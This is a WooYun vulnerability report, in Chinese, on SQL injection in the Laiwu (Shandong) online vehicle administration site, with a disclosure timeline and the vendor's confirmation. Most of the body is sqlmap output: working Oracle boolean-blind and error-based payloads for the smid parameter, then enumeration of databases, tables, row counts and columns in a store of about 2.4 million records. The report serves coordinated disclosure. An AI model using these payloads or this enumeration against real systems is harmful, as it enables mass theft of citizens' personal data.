当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163485

漏洞标题:山东省莱芜市网上车管所SQL注入漏洞涉及240W详细信息以及大量管理员明文密码

相关厂商:山东省莱芜市网上车管所

漏洞作者: 路人甲

提交时间:2015-12-22 15:16

修复时间:2016-02-07 17:56

公开时间:2016-02-07 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-25: 厂商已经确认,细节仅向厂商公开
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-07: 细节向公众公开

简要描述:

山东省莱芜市网上车管所SQL注入漏洞涉及240W详细信息以及大量管理员明文密码

详细说明:

发现一处注入点,太多数据了,240W数据包括个人的详细信息以及大量管理员明文密码等等,就不一一跑出来了。。。。
注入点:**.**.**.**:9080/wscgs/xwl.do?smid=18&bgid=02&bj=8
**.**.**.**:9080/wscgs/xwl.do?smid=18
the SQL query used returns 2402024 entries

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: smid (GET)
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace
    Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: smid (GET)
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace
    Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: smid (GET)
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace
    Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)
---
the SQL query used returns 2402024 entries
web application technology: JSP
back-end DBMS: Oracle
available databases [34]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] LWTJ
[*] LWZXSL
[*] MDSYS
[*] NET
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] QSWEBCGS_USER
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] VEH_ADMIN
[*] VIO_ADMIN
[*] WKSYS
[*] WMS_USER
[*] WMSYS
[*] WSCGS
[*] XDB
Database: QSWEBCGS_USER
[151 tables]
+----------------------------+
| ALL_TAB                    |
| CODE                       |
| CODETYPE                   |
| DRIVINGLICENSE_TB          |
| DRV_EXAMCARD_TB            |
| DRV_EXAMINATION_SITE_TB    |
| DRV_FLOW_TB                |
| DRV_LEARNER_VEHICLE_TB     |
| DRV_POINTRESET             |
| DRV_PREASIGN_TB            |
| DRV_SCHOOLINFO_TB          |
| DRV_TRAININGRECORDS_BF     |
| DRV_TRAININGRECORDS_TB     |
| KSBM_BM                    |
| KSBM_BMRZ                  |
| KSBM_CODE                  |
| KSBM_GLBM                  |
| KSBM_IPCSXZ                |
| KSBM_JLC                   |
| KSBM_JX                    |
| KSBM_JXJLY                 |
| KSBM_JXPM                  |
| KSBM_KSYY                  |
| KSBM_LLS                   |
| KSBM_QXBM                  |
| KSBM_TS                    |
| KSBM_USER                  |
| KSBM_XZQH                  |
| KSBM_YHQX                  |
| KSBM_YWLX                  |
| LOGS                       |
| MFXX_FLOW                  |
| MFXX_LEARN_INFO            |
| MFXX_RECORD                |
| SDGA_EXAMPXJL              |
| SYS_LOG                    |
| SYS_LOG_PRO                |
| SYS_MANAGER                |
| SYS_PARA                   |
| SYS_USER                   |
| SYS_USER_ONLINE            |
| TAB_COLS                   |
| VEHICLE_TB                 |
| VEHICLE_TEMP_TB            |
| VEH_FLOW_TB                |
| VIO_FINE_TB                |
| VIO_SURVEIL_TB             |
| VIO_VIOLATION_TB           |
| WSCGS_BQ                   |
| WSCGS_CODE                 |
| WSCGS_CODERQ               |
| WSCGS_CODETYPE             |
| WSCGS_CODEWFDM             |
| WSCGS_CSSZ                 |
| WSCGS_FWL                  |
| WSCGS_GGDRV                |
| WSCGS_GGH                  |
| WSCGS_GGVEH                |
| WSCGS_HPZY_SUPPLY          |
| WSCGS_JCXYY_BLACKLIST      |
| WSCGS_JCXYY_JCXDD          |
| WSCGS_JCXYY_PCSZ           |
| WSCGS_JCXYY_PREASIGN       |
| WSCGS_JCXYY_RZ             |
| WSCGS_JCXYY_SJD            |
| WSCGS_JCXYY_TZTG           |
| WSCGS_JCXYY_USER           |
| WSCGS_JKCSSZ               |
| WSCGS_JSRZJ_DRV            |
| WSCGS_JSRZJ_DWUSER         |
| WSCGS_JSRZJ_HTUSER         |
| WSCGS_JSRZJ_IDANDDWDH      |
| WSCGS_JSRZJ_NEWS           |
| WSCGS_JSRZJ_TZTG           |
| WSCGS_JSRZJ_VEH            |
| WSCGS_JSZJ_PERSON          |
| WSCGS_JXPM                 |
| WSCGS_JXPMH                |
| WSCGS_JXPMH_TB             |
| WSCGS_JXPM_TB              |
| WSCGS_KSYY_DRV_PREASIGN    |
| WSCGS_KSYY_DRV_PREASIGN_TB |
| WSCGS_KSYY_FEEGATE         |
| WSCGS_KSYY_JXRSSZ          |
| WSCGS_KSYY_JXRSSZ_TB       |
| WSCGS_KSYY_KCLX            |
| WSCGS_KSYY_KSPC            |
| WSCGS_KSYY_KSPC_TB         |
| WSCGS_KSYY_PXINFOGATE      |
| WSCGS_KSYY_PXINFOGATE_TB   |
| WSCGS_KSYY_PXJLXX          |
| WSCGS_KSYY_RZ              |
| WSCGS_KSYY_USER            |
| WSCGS_KSYY_USER_TB         |
| WSCGS_KSYY_YYJG            |
| WSCGS_LY                   |
| WSCGS_MAP                  |
| WSCGS_NEWS                 |
| WSCGS_QQXX                 |
| WSCGS_REGUSER              |
| WSCGS_RIGHT                |
| WSCGS_SXFW                 |
| WSCGS_TJBLYW               |
| WSCGS_TJBLYW_TB            |
| WSCGS_TJLY_TB              |
| WSCGS_USERS                |
| WSCGS_WBXX                 |
| WSCGS_XHBEFORE             |
| WSCGS_XHBEFORE_COPY        |
| WSCGS_XHBEFORE_TB          |
| WSCGS_XHHPHD               |
| WSCGS_XHHPZY               |
| WSCGS_XHHPZYBY             |
| WSCGS_XHHPZY_TB            |
| WSCGS_XHIPHMD              |
| WSCGS_XHJKDZ               |
| WSCGS_XHKXHD               |
| WSCGS_XHKXHD_TB            |
| WSCGS_XHPROERR             |
| WSCGS_XHPRO_SECURITY       |
| WSCGS_XHPRO_SECURITY_COPY  |
| WSCGS_XHPRO_STEP           |
| WSCGS_XHRZ                 |
| WSCGS_XHSYSINFO            |
| WSCGS_XHSYSINFO_TB         |
| WSCGS_XHUSER               |
| WSCGS_XHXD                 |
| WSCGS_XHXD_TB              |
| WSCGS_XXBG_CODE            |
| WSCGS_XXBG_GLBM            |
| WSCGS_XXBG_JDCXX           |
| WSCGS_XXBG_JDCXXBGRZ       |
| WSCGS_XXBG_JDCXX_TB        |
| WSCGS_XXBG_JSRXX           |
| WSCGS_XXBG_JSRXXBGRZ       |
| WSCGS_XXBG_JSRXX_TB        |
| WSCGS_XXBG_PERSON          |
| WSCGS_XXBG_USER            |
| WSCGS_XXBG_YHJB            |
| WSCGS_XXBG_YHXQ            |
| WSCGS_XXCX_USER            |
| WSCGS_YQLJ                 |
| WSCGS_ZXYW_LSHP            |
| WSCGS_ZXYW_LSHPZP          |
| WSCGS_ZXYW_PLATECLRZ       |
| WSCGS_ZXYW_PLATEDRV        |
| WSCGS_ZXYW_PLATEVEH        |
| WSCGS_ZXYW_PLATEZP         |
| WSCGS_ZXYW_USER            |
| WSCGS_ZXYW_WTJY            |
| WSCGS_ZXYW_WTJYZP          |
+----------------------------+


2.png


3.png


4.png


5.png


漏洞证明:

the SQL query used returns 2402024 entries
Database: QSWEBCGS_USER
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| WSCGS_XHRZ              | 2402024 |
| SYS_LOG_PRO             | 1091760 |
| WSCGS_XHPRO_SECURITY    | 253322  |
| SDGA_EXAMPXJL           | 167522  |
| LOGS                    | 38583   |
| WSCGS_KSYY_DRV_PREASIGN | 30241   |
| SYS_LOG                 | 18617   |
| WSCGS_XHXD              | 17961   |
| WSCGS_XHHPZY            | 9146    |
| WSCGS_XHBEFORE_COPY     | 6398    |
| WSCGS_LY                | 2854    |
| WSCGS_KSYY_RZ           | 1791    |
| WSCGS_JCXYY_PCSZ        | 1230    |
| WSCGS_CODEWFDM          | 779     |
| WSCGS_REGUSER           | 730     |
| TAB_COLS                | 605     |
| WSCGS_KSYY_JXRSSZ       | 526     |
| WSCGS_NEWS              | 480     |
| WSCGS_CODE              | 409     |
| WSCGS_XHBEFORE          | 365     |
| WSCGS_KSYY_KSPC         | 311     |
| WSCGS_JSZJ_PERSON       | 210     |
| WSCGS_XXBG_JSRXX        | 125     |
| WSCGS_XXBG_JDCXX        | 91      |
| WSCGS_ZXYW_PLATEZP      | 90      |
| CODE                    | 66      |
| WSCGS_CODETYPE          | 66      |
| WSCGS_CODERQ            | 64      |
| WSCGS_ZXYW_WTJYZP       | 63      |
| SYS_USER                | 58      |
| MFXX_FLOW               | 54      |
| WSCGS_RIGHT             | 49      |
| WSCGS_ZXYW_WTJY         | 31      |
| ALL_TAB                 | 30      |
| CODETYPE                | 18      |
| WSCGS_KSYY_USER         | 12      |
| WSCGS_XHPROERR          | 12      |
| WSCGS_ZXYW_PLATEDRV     | 12      |
| WSCGS_ZXYW_PLATEVEH     | 9       |
| KSBM_YHQX               | 8       |
| WSCGS_JCXYY_SJD         | 8       |
| WSCGS_JCXYY_PREASIGN    | 7       |
| WSCGS_XHKXHD            | 7       |
| WSCGS_XXBG_YHXQ         | 7       |
| WSCGS_XXBG_CODE         | 5       |
| KSBM_CODE               | 4       |
| WSCGS_JCXYY_USER        | 4       |
| WSCGS_KSYY_FEEGATE      | 4       |
| WSCGS_KSYY_PXINFOGATE   | 4       |
| WSCGS_KSYY_YYJG         | 4       |
| WSCGS_JCXYY_JCXDD       | 3       |
| WSCGS_XHPRO_STEP        | 3       |
| WSCGS_JCXYY_RZ          | 2       |
| WSCGS_SXFW              | 2       |
| WSCGS_USERS             | 2       |
| WSCGS_WBXX              | 2       |
| WSCGS_XXBG_YHJB         | 2       |
| WSCGS_YQLJ              | 2       |
| KSBM_GLBM               | 1       |
| KSBM_USER               | 1       |
| SYS_MANAGER             | 1       |
| WSCGS_BQ                | 1       |
| WSCGS_CSSZ              | 1       |
| WSCGS_FWL               | 1       |
| WSCGS_JKCSSZ            | 1       |
| WSCGS_JSRZJ_HTUSER      | 1       |
| WSCGS_XHJKDZ            | 1       |
| WSCGS_XHSYSINFO         | 1       |
| WSCGS_XHUSER            | 1       |
| WSCGS_XXBG_GLBM         | 1       |
| WSCGS_XXBG_USER         | 1       |
| WSCGS_XXCX_USER         | 1       |
| WSCGS_ZXYW_USER         | 1       |
+-------------------------+---------+
Database: QSWEBCGS_USER
Table: WSCGS_XHRZ
[13 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| BLSJ   | DATE     |
| BZ1    | VARCHAR2 |
| BZ2    | VARCHAR2 |
| CLSBDH | VARCHAR2 |
| CZBZ   | VARCHAR2 |
| GLBM   | VARCHAR2 |
| HPHM   | VARCHAR2 |
| HPZL   | VARCHAR2 |
| IP     | VARCHAR2 |
| SFCG   | VARCHAR2 |
| SID    | VARCHAR2 |
| YWLX   | VARCHAR2 |
| YZM    | VARCHAR2 |
+--------+----------+


6.png


7.png


8.png


31.png


修复方案:

修复咯

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-25 16:01

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无